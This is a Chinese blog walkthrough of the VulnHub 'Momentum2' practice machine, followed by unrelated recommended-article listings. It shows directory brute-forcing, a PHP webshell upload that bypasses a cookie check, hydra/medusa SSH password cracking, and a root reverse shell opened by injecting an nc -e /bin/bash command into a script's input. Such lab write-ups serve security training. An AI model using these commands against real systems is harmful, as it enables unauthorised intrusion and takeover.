vlunhub系列之Momentum2

最新推荐文章于 2024-05-16 17:13:53 发布
最新推荐文章于 2024-05-16 17:13:53 发布
阅读量90 收藏
点赞数
分类专栏: 靶机 文章标签: 网络安全 web安全 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanjinming110/article/details/129474938
版权

靶机Momentum2

如果主机发现发现不了ip地址请看这里:https://hackergu.com/vulnhub-ip/

arp-scan主机发现nmap端口扫描
在这里插入图片描述

端口扫描
在这里插入图片描述

发现并没有可以利用的内容
在这里插入图片描述在这里插入图片描述

我们使用dirb nikto 以及dirbuster进行目录爆破

dirb http://192.168.12.100/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -X .bak,.php,.html,.bak.php,.bak.bak,.php.bak   -X 指定后缀名 -w 指定字典

我们去看一下
在这里插入图片描述

这里可以将这个php的备份文件下载
在这里插入图片描述

这里找到一个传文件的
在这里插入图片描述

这里发现一个js的
在这里插入图片描述在这里插入图片描述在这里插入图片描述

这里是我们发现的所有内容
在这里插入图片描述在这里插入图片描述

这里我们分析这个js代码,意思是post请求传文件,并且将文件传递到ajax.php这里,然后通过ajax代码过滤之后,上传到指定路径,如果服务器响应为1则为上传成功
如果是其他的则为失败,所以我们要对ajax.php这我文件源码进行分析,而刚才我们将他下载了。
在这里插入图片描述

这个源码的意思是要在cookie的末尾加一个大写字母,并且是admin的cookie(&G6u@B6uDXMq&Ms),并且会增加一个新的post参数secure它的值为val1d,如果满足这些条件的话可以上传dpf php 以及txt,否则只能上传txt 所以我们这里需要去构建一个post的且有使用admin的cookie,然后传一个webshell
在这里插入图片描述

在这里我们也找到了上传路径,关于owls
在这里插入图片描述

所以我们构建好传一个webshell即可
在这里插入图片描述

这里我们构建完成,但是还需要cookie的最后一个大写字母,我们将其爆破出来
在这里插入图片描述

这里成功得到最后一个字母是R,所以这里我们成功的传入了我们的一句话
在这里插入图片描述

这里我们也找到
在这里插入图片描述

这里我们就可以使用蚁剑连接
在这里插入图片描述

这里成功连接
在这里插入图片描述

在这里找到第一个falg
在这里插入图片描述在这里插入图片描述

发现一个这个 从password文件中发现的

myvulnerableapp[Asterisk]   asterrisk是* 密码是myvulnerableapp*

这里我们并不知道后面是个什么 内容我们可以使用hydra爆破一下,我们生成与myvulnerableapp相关的字典

crunch 16 16 -t myvulnerableapp, >> password.txt
crunch 16 16 -t myvulnerableapp@ >> password.txt
crunch 16 16 -t myvulnerableapp% >> password.txt
crunch 16 16 -t myvulnerableapp^ >> password.txt

生成一个字典
在这里插入图片描述

使用hydra爆破,因为这个在athena这个家目录下面发现的,所以我们用户名使用这个尝试

hydra -l athena -P /root/password.txt  -e ns 192.168.12.100 ssh

使用-l 指定用户 -P 指定字典
在这里插入图片描述

成功拿下

medusa -h 192.168.12.100 -u athena -P /root/password.txt -M ssh -f

使用medusa也能拿下
在这里插入图片描述

那我们就ssh登陆

ssh athena@192.168.12.100
athena@192.168.12.100's password:myvulnerableapp*

但是这里并非root,我们需要提权
在这里插入图片描述

这里我们可以看到我们可以使用一个python的文件来提权,我们去看一下
在这里插入图片描述在这里插入图片描述

查看文件的内容,脚本的意思是,在运行脚本时会要求输入一个seed,这个seed会echo到log.txt文件中,在echo时会执行bash命令,所以这里直接反弹一个shell就可以提权了!
在这里插入图片描述

这里我们本地监听1111 直接反弹1111且弹一个/bin/bash即可

Enter the seed : ;nc -e /bin/bash 192.168.12.20 1111;  这里需要一个; 要不然不成功

在这里插入图片描述

成功弹上
在这里插入图片描述

拿下!
希望对各位有帮助,后续的靶机还在持续更新中!

JM丫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Chrome浏览器必备插件momentum
03-10
Momentum插件是一款桌面显示清新,自带时钟,自动更换高清壁纸,任务日历和工作清单的chrome浏览器插件。 官方的解释就是:替换你 Chrome 浏览器默认的“标签页”。里面的图片全部来自500PX里面的高清图,无广告,无...
深度学习中的优化算法之带Momentum的SGD
网络资源是无限的
05-08 3167
之前在https://blog.csdn.net/fengbingchun/article/details/123955067介绍过SGD(Mini-Batch Gradient Descent(MBGD),有时提到SGD的时候,其实指的是MBGD)。这里介绍下带动量(Momentum)的SGD。 SGD(Stochastic Gradient Descent)难以导航沟壑(SGD has trouble navigating ravines),即SGD在遇到沟壑时容易陷入震荡。 ...
ADS仿真 之 Momentum 仿真实战
大音希声
01-08 1640
3、 合理布局三个元件的位置,并删除两个接地符号,在layout中,如上面的两个接地符号是没有意义的, 只是作为一个接地提醒,经过布局后的原理图如下,包括元件的走线,和外面包地以及地孔, 元件的走线、包地的形状如9.1节中介绍一样,采用矩形绘画工具完成,绘画时选择的layer为cond层,地孔的添加时选择hole层。8、 新建一个原理图,在原理图中打开元件库,在projects下面找到相应的工程下面的新建元件,将其添加到原理图中,按照S参数仿真方式,添加相应的仿真控件和终端, 即可运行仿真。
深度学习入门之Momentum
热门推荐
weixin_46713695的博客
03-01 1万+
Momentum Momentum 是“动量”的意思,和物理有关。用数学式表示 Momentum 方法,如下所示。 和 SGD(随机梯度下降) 一样, W 表示要更新的权重参数,∂L/∂W表示损失函数关于 的梯度,η 表示学习率。这里新出现了一个变量 ,对应物理上的速度。式(6.3)表示了物体在梯度方向上受力,在这个力的作用下,物体的速度增加这一物理法则。如图 6-4 所示,Momentum 方法给人的感觉就像是小球在地面上滚动。 图 6-4 Momentum:小球在斜面上滚动 式(6.3)
深度学习优化算法大全系列2: Momentum(动量)
bitcarmanlee的博客
01-10 1944
1.Momentum要解决的问题 SGD有个问题就是收敛过程会产生震荡,这个相信大家都明白。Momentum主要解决的就是这个问题。 具体的解决思路为在SGD基础上引入一阶动量,公式可以表示如下: mt=β1⋅mt−1+(1−β1)⋅gtm_t = \beta_1 \cdot m_{t-1} + (1- \beta_1) \cdot g_tmt​=β1​⋅mt−1​+(1−β1​)⋅gt​ 其中,β1\beta_1β1​为超参数,经验值为0.9。β1\beta_1β1​越大,说明当前动量主要由以前累积的方
NN中的学习技巧之(一)参数的最优化之 Momentum
wulimmya的博客
08-20 5197
前面的博文里说了SGD,最基础的一个梯度下降优化算法,在SGD之后还有很多改进版本的算法,比如动量法,下面我降动量法扥别作用于两个函数,第一个是完美凸函数,第二个则是非凸的香蕉函数 函数1:(Rosenbrock函数) f(x,y)=(a−x)2+b(y−x2)2f(x,y)=(a-x)^2+b(y-x^2)^2f(x,y)=(a−x)2+b(y−x2)2 取a=1,b=100 从下图可以看出,...
ads momentum 指南2
04-15
ads momentum 应用指南英文版2
Momentum插件
09-26
Momentum.crx 主页美化插件
Momentum_v1.12.3.rar
02-12
Chrome美化插件Momentum离线压缩包 v1.12.3版本 q
Chrome必备插件momentum
07-04
Momentum插件是一款自动更换壁纸,自带时钟,任务日历和工作清单的chrome浏览器插件。官方的解释就是:替换你 Chrome 浏览器默认的“标签页”。里面的图片全部来自500PX里面的高清图,无广告,无弹窗,非常适合...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8226
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【网络安全】一次sql注入问题的处理
dualvencsdn的博客
05-10 376
(1)在进行问题解决之前,我们发现 ,即使我们已经在后能进行了打印,确保了不会有sql注入问题。如下。但在当时 ,依然 会有被 -dbs扫描而出的数据库思考:经过程序的打印,已经没有了不正确的sql注入;但依然可以dbs扫描打印出数据库信息 ,有可能是缓存的信息,前面扫描出来的数据库信息!(2)将sqlmap的缓存文件,如下,其中session.sqlite进行取出,用chat2db打开。发现其中的缓存 信息。如下列各图。
网络安全之OSPF进阶详解
m0_65858385的博客
05-13 894
功能:本路由器针对某个区域产生的路由信息和拓扑信息(因为OSPF是一个状态型路由协议),比如该拓扑中R1的所有都在area 1中,所以R1针对area 1中只产生一条LSA而这条LSA包含了R1在该区域的路由信息和拓扑信息,R2针对area 1区域产生一条LSA,在area 0中也产生一条一类LSA,但这两条一类LSA不一样,area1中是R2在area1中的路由信息与拓扑信息,area0中是R2在area0中的路由信息与拓扑信息,所以在area1中有两条一类LSA。发送的是BDB报文进行主从选举。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 518
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Web安全:企业如何抵御常见的网络攻击?
最新发布
m0_66326520的博客
05-16 345
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 2090
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《2024网络安全报告》中文版
2301_76786857的博客
05-10 488
Check Point发布了《2024 年网络安全报告》,Check Point Research 对网络攻击数据(包括所有地区和全球的统计数据)进行了全面分析,揭示了不断变化的网络威胁形势。● 勒索软件攻击形势严重恶化,传统勒索软件和更难应对的大规模勒索软件攻击均大幅增长。● 去年,全球 1/10 的机构遭遇勒索软件攻击尝试,比上一年激增 33%● 零售/批发相关企业每周所遇攻击次数骤增。
等保测评:构建网络安全的坚实防线
weixin_64392888的博客
05-13 511
等保测评作为网络安全管理的关键环节,对于提高信息系统的安全性能、保障信息安全、促进信息化建设的健康发展具有不可替代的作用。这些法律法规确立了等保测评的法律地位,明确了网络运营者的安全保护义务,并对关键信息基础设施的保护提出了明确要求。等保测评是指依据国家相关法律法规和标准,对信息系统的安全保护状况进行系统的评估和测试。同时,等保测评有助于规范组织的信息安全管理制度,加强对安全政策和流程的执行,确保网络安全合规运营。2. **安全风险评估**:全面评估信息系统的安全风险,识别潜在的安全威胁。
信安标委发布16项网络安全国家标准:8项为旧标准替代,8项标准为新发布
网络安全
05-10 1185
当前公开发布的标准,在全国标准信息服务平台还尚未收录,暂无公开获取渠道。后续博主会持续跟进,在文章中附上对应的标准文档下载链接。根据2024年4月25日国家市场监督管理总局、国家标准化管理委员会发布的。全国网络安全标准化技术委员会归口的16项国家标准正式发布。
momentum参数
07-27
momentum参数是在优化算法中常用的一个超参数,它用于控制模型在更新参数时的速度和方向。具体来说,它指定了模型在每次参数更新中应该考虑多少先前的梯度信息。 在梯度下降算法中,每次更新参数时,会根据当前的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JM丫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值